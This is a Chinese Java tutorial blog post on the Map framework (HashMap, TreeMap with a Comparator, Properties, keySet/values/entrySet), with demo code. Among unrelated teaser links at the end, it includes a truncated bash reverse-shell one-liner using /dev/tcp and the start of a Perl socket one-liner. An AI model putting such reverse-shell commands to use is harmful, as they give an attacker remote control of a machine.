前言:最近几天都在生病,退烧之后身体虚弱、头疼。在床上躺了几天,什么事情都干不了。接下来这段时间,要好好加快进度才好。

前面用了三篇文章的篇幅学习了Collection框架的相关内容,而Map框架相对而言比较简单,争取在这一篇博客里面讲完。

2.1 键值对应的Map

就如同网络搜索,根据关键字可找到对应的数据,程序设计中也常有这类需求,根据某个键(Key)来取得对应的值(Value)。可以事先利用java.util.Map接口的操作对象来建立键值对应数据,之后若要取得值,只要用对应的键就可以迅速取得。

同样地,在学习Map相关API之前,先了解框架设计架构对正确使用API会有帮助。

从图中我们可以看到,常用的Map操作类为java.util.HashMap与java.util.TreeMap,其继承自抽象类java.util.AbstractMap。至于java.HashTable是从JDK1.0就遗留下来的API,不建议使用,所以也不会多加讲述。但是它的子类Properties却非常频繁地被使用,因此将会一起介绍。

2.2 使用HashMap

Map的使用比较简单,所以我们先直接写一个关于HashMap的demo,根据指定的姓名获取对应的备注信息:

 import java.util.*;

 /**
* HashMap的实验用例
*/
public class Remarks {
public static void main(String[] args) {
Map<String, String> remarks = new HashMap<>();
remarks.put("Jack", "一个高大帅气的小伙子");
remarks.put("Jane", "一位落落大方的小淑女");
remarks.put("Tom", "一个人到中年的怪大叔"); Scanner scanner = new Scanner(System.in);
System.out.print("请输出需要查询的姓名: ");
String remark = remarks.get(scanner.nextLine());
System.out.println(remark);
System.out.println(remarks);
}
}

要建立键值对应,可以使用put()方法,第一个自变量是键,第二个自变量是值。在Map框架当中,键是不会重复的,在这一点上跟之前学习过的Set类似。因为判断键是否重复要根据hashCode()方法和equals()方法,所以作为键的对象必须实现这两个方法,否则就会出错(如有需要,可以重新阅读Collection框架系列文章中的第二篇)。如果要取回跟键对应的值,我们要使用get()方法。

在HashMap中建立键值对应之后,键是无序的,这可以在执行结果中看到。如果想让键是有序的,我们可以选择使用TreeMap.

2.3 使用TreeMap

我们刚才提到,TreeMap会对键进行排序,而排序就需要比较大小。

在之前讲Collection的文章里曾经提到过,如果要比较大小,就要求参与比较的对象必须实现Comparable接口,或者是指定实现Comparator接口的对象,例如我们接下来要运行的两个demo:

 import java.util.*;

 /**
* TreeMap的实验用例
*/
public class Remarks {
public static void main(String[] args) {
Map<String, String> remarks = new TreeMap<>();
remarks.put("Jack", "一个高大帅气的小伙子");
remarks.put("Jane", "一位落落大方的小淑女");
remarks.put("Tom", "一个人到中年的怪大叔"); System.out.println(remarks);
}
}

因此String本身就已经实现了Comparable接口,所以我们可以看到结果是根据键来排序的:

假设我们想要看到相反的排序结果,那么我们可以用到之前就提到过的实现Comparator接口的方法:

 import java.util.*;

 /**
* TreeMap的实验用例
*/
class StringComparator implements Comparator<String> {
@Override
public int compare(String s1, String s2) {
return -s1.compareTo(s2);
}
} public class Remarks {
public static void main(String[] args) {
Map<String, String> remarks = new TreeMap<>(new StringComparator());
remarks.put("Jack", "一个高大帅气的小伙子");
remarks.put("Jane", "一位落落大方的小淑女");
remarks.put("Tom", "一个人到中年的怪大叔"); System.out.println(remarks);
}
}

创建TreeMap的时候指定了StringComparator对象,所以我们可以得到想要的结果:

2.4 使用Properties

虽然Properties有Map的行为,也可以使用put()设定键值对应、get()取得键对应的值,不过一般我们更多的是使用Properties的setPropertity()指定字符串类型的键值,getProperty()指定字符串类型的键,取回字符串类型的值,通常称为属性名称与属性值。例如这样的语句:

         Properties props = new Properties();
props.setProperty("username", "jack");
props.setProperty("password", "123456");
System.out.println(props.getProperty("username"));
System.out.println(props.getProperty("password"));

使用Properties一般有两种常见方式,一是载入.properties文档,二是使用loadFromXML()方法加载.xml文档。由于篇幅关系,这里就不详细举例说明了。

2.5 Map的键和值

如果想取得Map中所有的键,或是想取得Map中所有的值该怎么做?Map虽然与Collection没有继承上的关系,然而却是彼此搭配的关系。

如果想取得Map中所有的键,可以调用Map的keySet()方法返回Set对象。因为键是不重复的,所以我们很容易理解为什么用Set来返回。如果想取得Map中所有的值,则可以使用values()返回Collection对象。例如下面这个demo:

 import java.util.*;

 /**
* Map的键和值实验用例
*/
public class MapKeyValue {
public static void main(String[] args) {
Map<String, String> map = new HashMap<>();
map.put("one","一");
map.put("two","二");
map.put("three","三"); System.out.println("显示所有的键");
foreach(map.keySet()); System.out.println("显示所有的值");
foreach(map.values());
} public static void foreach(Iterable<String> iterable) {
for(String element : iterable) {
System.out.println(element);
}
}
}

运行之后,我们可以看到这样的结果:

如果想要同时取得Map的键和值,可以使用entrySet()方法,返回一个Set对象。这个Set里面的每一个元素都是Map.Entry实例,可以调用getKey()方法取得键,调用getValue()方法取得值。

2.6 Map框架小结

相比Collection框架,Map框架较为简单,需要熟悉了解的常用类只有HashMap、TreeMap和Properties三种。也因为之前已经学习过Collection框架,有了相关的知识储备,所以在新的学习过程当中可以省下不少功夫,例如为什么Map的键必须实现hashCode()和equals()方法,为什么TreeMap的键必须实现Comparable接口或指定实现了Comparator接口的对象。

这就体现出了之前我们常常提及的“熟悉框架架构”的重要性,不仅容易理解为什么要这样设计,还方便之后的记忆和使用。很多人学习JavaSE都会有一个问题,就是死记硬背API——在网上找到一些文章(往往写得不好),记住里面的一两句话就以为自己掌握了。其实,这远远不够。

当然,熟悉API架构只是刚起步,更多的掌握过程要在大量的实际编程中实现。只要一开始动手写代码,你就会发现自己学来的东西是有用的。同时也会发现存在问题和漏洞,但是一旦查缺补漏完毕,你的水平将会上升不止一个层次。

相关文章推荐:

JavaSE中Collection集合框架学习笔记(1)——具有索引的List

JavaSE中Collection集合框架学习笔记(2)——拒绝重复内容的Set和支持队列操作的Queue

JavaSE中Collection集合框架学习笔记(3)——遍历对象的Iterator和收集对象后的排序

如果你喜欢我的文章,可以扫描关注我的个人公众号“李文业的思考笔记”。

不定期地会推送我的原创思考文章。

JavaSE中Map框架学习笔记的更多相关文章

  1. ES6中Map数据结构学习笔记

    很多东西就是要细细的品读然后做点读书笔记,心理才会踏实- Javascript对象本质上就是键值对的集合(Hash结构),但是键只能是字符串,这有一定的限制. 1234 var d = {}var e ...

  2. JavaSE中线程与并行API框架学习笔记1——线程是什么?

    前言:虽然工作了三年,但是几乎没有使用到多线程之类的内容.这其实是工作与学习的矛盾.我们在公司上班,很多时候都只是在处理业务代码,很少接触底层技术. 可是你不可能一辈子都写业务代码,而且跳槽之后新单位 ...

  3. JavaSE中线程与并行API框架学习笔记——线程为什么会不安全?

    前言:休整一个多月之后,终于开始投简历了.这段时间休息了一阵子,又病了几天,真正用来复习准备的时间其实并不多.说实话,心里不是非常有底气. 这可能是学生时代遗留的思维惯性--总想着做好万全准备才去做事 ...

  4. JavaSE中Collection集合框架学习笔记(2)——拒绝重复内容的Set和支持队列操作的Queue

    前言:俗话说“金三银四铜五”,不知道我要在这段时间找工作会不会很艰难.不管了,工作三年之后就当给自己放个暑假. 面试当中Collection(集合)是基础重点.我在网上看了几篇讲Collection的 ...

  5. JavaSE中Collection集合框架学习笔记(3)——遍历对象的Iterator和收集对象后的排序

    前言:暑期应该开始了,因为小区对面的小学这两天早上都没有像以往那样一到七八点钟就人声喧闹.车水马龙. 前两篇文章介绍了Collection框架的主要接口和常用类,例如List.Set.Queue,和A ...

  6. Yii框架学习笔记(二)将html前端模板整合到框架中

    选择Yii 2.0版本框架的7个理由 http://blog.chedushi.com/archives/8988 刚接触Yii谈一下对Yii框架的看法和感受 http://bbs.csdn.net/ ...

  7. Java基础及JavaWEB以及SSM框架学习笔记Xmind版

    Java基础及JavaWEB以及SSM框架学习笔记Xmind版 转行做程序员也1年多了,最近开始整理以前学习过程中记录的笔记,以及一些容易犯错的内容.现在分享给网友们.笔记共三部分. JavaSE 目 ...

  8. j2ee开发之Spring2.5框架学习笔记

    Spring 2.5框架学习笔记 1.是一个开源的控制反转IOC和面向切面AOP的容器框架 2.IOC控制反转 public class PersonServiceBean { private Per ...

  9. phalcon(费尔康)框架学习笔记

    phalcon(费尔康)框架学习笔记 http://www.qixing318.com/article/phalcon-framework-to-study-notes.html 目录结构   pha ...

随机推荐

  1. 【翻译】光速React – Vixlet

    翻译原文链接:https://blog.vixlet.com/react-at-light-speed-78cd172a6411 个人翻译小站链接:http://www.zcfy.cc/article ...

  2. oracle创建用户四部曲

    创建用户一般分四步: 第一步:创建临时表空间 第二步:创建数据表空间 第三步:创建用户并制定表空间 第四步:给用户授予权限 创建临时表空间 create temporary tablespace ho ...

  3. RabbitMQ安装配置和基于EasyNetQ驱动的基础使用

    一.RabbitMQ基本概念和原理 1.AMQP,即Advanced Message Queuing Protocol,高级消息队列协议,是应用层协议的一个开放标准,为面向消息的中间件设计. 2.Ra ...

  4. nodejs零基础详细教程1:安装+基础概念

    第一章 建议学习时间2小时  课程共10章 学习方式:详细阅读,并手动实现相关代码 学习目标:此教程将教会大家 安装Node.搭建服务器.express.mysql.mongodb.编写后台业务逻辑. ...

  5. 软件raid 5

    软件raid 5的实现 RAID 5 是一种存储性能.数据安全和存储成本兼顾的存储解决方案. RAID 5可以理解为是RAID 0和RAID 1的折中方案.RAID 5可以为系统提供数据安全保障,但保 ...

  6. 各种语言一句话反弹shell

    Bash [不通用,跟linux发行版本有关,在ubuntu上测试成功] bash -i >& /dev/tcp/ >& Perl perl -e 'use Socket; ...

  7. DNS域名解析的过程

    一.主机解析域名的顺序 1.找缓存 2.找本机的hosts文件 3.找DNS服务器 注意: 配置IP和主机名时,要记得修改/etc/hosts文件,因为有些应用程序在主机内的进程之间通信的时候,会本机 ...

  8. 模拟jquery底层链式编程

    //特点1:快级作用域,程序启动自动执行 //内部的成员变量,外部无法访问(除了var) //简单的函数链式调用 function Dog(){ this.run=function(){ alert( ...

  9. Jmeter元件运行顺序

    JMeter执行顺序逻辑如下: 1.配置元件(如果存在) 2.前置处理器(如果存在) 3.定时器(如果存在) 4.取样器(如果存在) 5.后置处理器(如果存在且取样器的结果不为空) 6.断言(如果存在 ...

  10. 一步一步教你将开源项目上传到jcenter

    最近闲着看了一下jcenter的使用,也想将自己使用频率比较高的东西抽成类库,然后通过compile来使用,提高开发效率,本来以为挺简单的,但是网上介绍的比较模糊,很多博客也比较老了,不适用,花了我一 ...